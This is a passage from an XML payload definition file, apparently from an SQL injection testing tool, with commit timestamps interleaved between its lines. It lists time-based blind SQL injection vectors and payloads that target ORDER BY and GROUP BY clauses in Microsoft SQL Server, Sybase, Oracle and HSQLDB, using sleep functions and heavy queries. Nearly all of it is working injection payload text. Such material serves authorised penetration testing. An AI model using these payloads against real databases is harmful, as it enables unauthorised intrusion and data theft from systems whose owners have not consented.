<risk > 2</risk>
<clause > 2,3</clause>
<where > 1</where>
2016-06-03 11:29:04 +03:00
<vector > ,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END))</vector>
2015-02-18 13:13:44 +03:00
<request >
2016-06-03 11:29:04 +03:00
<payload > ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END))</payload>
2015-02-18 13:13:44 +03:00
</request>
<response >
<time > [DELAYED]</time>
</response>
<details >
<dbms > Microsoft SQL Server</dbms>
<dbms > Sybase</dbms>
</details>
</test>
<test >
2015-02-20 21:35:13 +03:00
<title > Oracle time-based blind - ORDER BY, GROUP BY clause (DBMS_LOCK.SLEEP)</title>
2015-02-18 13:13:44 +03:00
<stype > 5</stype>
<level > 3</level>
2015-02-20 18:44:06 +03:00
<risk > 1</risk>
2015-02-18 13:13:44 +03:00
<clause > 2,3</clause>
<where > 1</where>
<vector > ,(BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END;)</vector>
<request >
<payload > ,(BEGIN IF ([RANDNUM]=[RANDNUM]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END;)</payload>
</request>
<response >
<time > [SLEEPTIME]</time>
</response>
<details >
<dbms > Oracle</dbms>
</details>
</test>
<test >
2015-02-20 21:35:13 +03:00
<title > Oracle time-based blind - ORDER BY, GROUP BY clause (DBMS_PIPE.RECEIVE_MESSAGE)</title>
2015-02-18 13:13:44 +03:00
<stype > 5</stype>
<level > 3</level>
<risk > 1</risk>
<clause > 2,3</clause>
<where > 1</where>
<vector > ,(SELECT (CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)</vector>
<request >
<payload > ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)</payload>
</request>
<response >
<time > [SLEEPTIME]</time>
</response>
<details >
<dbms > Oracle</dbms>
</details>
</test>
<test >
2015-02-20 21:35:13 +03:00
<title > Oracle time-based blind - ORDER BY, GROUP BY clause (heavy query)</title>
2015-02-18 13:13:44 +03:00
<stype > 5</stype>
<level > 4</level>
<risk > 2</risk>
<clause > 2,3</clause>
<where > 1</where>
<vector > ,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)</vector>
<request >
<payload > ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)</payload>
</request>
<response >
<time > [DELAYED]</time>
</response>
<details >
<dbms > Oracle</dbms>
</details>
</test>
<test >
2015-02-20 21:35:13 +03:00
<title > HSQLDB > = 1.7.2 time-based blind - ORDER BY, GROUP BY clause (heavy query)</title>
2015-02-18 13:13:44 +03:00
<stype > 5</stype>
<level > 4</level>
<risk > 2</risk>
<clause > 2,3</clause>
<where > 1</where>
<vector > ,(SELECT (CASE WHEN ([INFERENCE]) THEN (ASCII(REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL))) ELSE [RANDNUM]/(SELECT 0 FROM INFORMATION_SCHEMA.SYSTEM_USERS) END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)</vector>
<request >
<payload > ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (ASCII(REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL))) ELSE [RANDNUM]/(SELECT 0 FROM INFORMATION_SCHEMA.SYSTEM_USERS) END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)</payload>
<comment > --</comment>
</request>
<response >
<time > [DELAYED]</time>
</response>
<details >
<dbms > HSQLDB</dbms>
<dbms_version > > = 1.7.2</dbms_version>
</details>
</test>
<test >
2015-02-20 21:35:13 +03:00
<title > HSQLDB > 2.0 time-based blind - ORDER BY, GROUP BY clause (heavy query)</title>
2015-02-18 13:13:44 +03:00
<stype > 5</stype>
<level > 4</level>
<risk > 2</risk>
<clause > 2,3</clause>
<where > 1</where>
<vector > ,(SELECT (CASE WHEN ([INFERENCE]) THEN (ASCII(REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL))) ELSE [RANDNUM]/(SELECT 0 FROM (VALUES(0))) END) FROM (VALUES(0)))</vector>
<request >
<payload > ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (ASCII(REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL))) ELSE [RANDNUM]/(SELECT 0 FROM (VALUES(0))) END) FROM (VALUES(0)))</payload>
</request>
<response >
<time > [DELAYED]</time>
</response>
<details >
<dbms > HSQLDB</dbms>
<dbms_version > > 2.0</dbms_version>
</details>
</test>
2016-09-28 11:30:09 +03:00
2015-03-19 15:09:43 +03:00
<!-- End of time - based boolean tests - ORDER BY, GROUP BY clause -->
2015-02-18 13:13:44 +03:00
</root>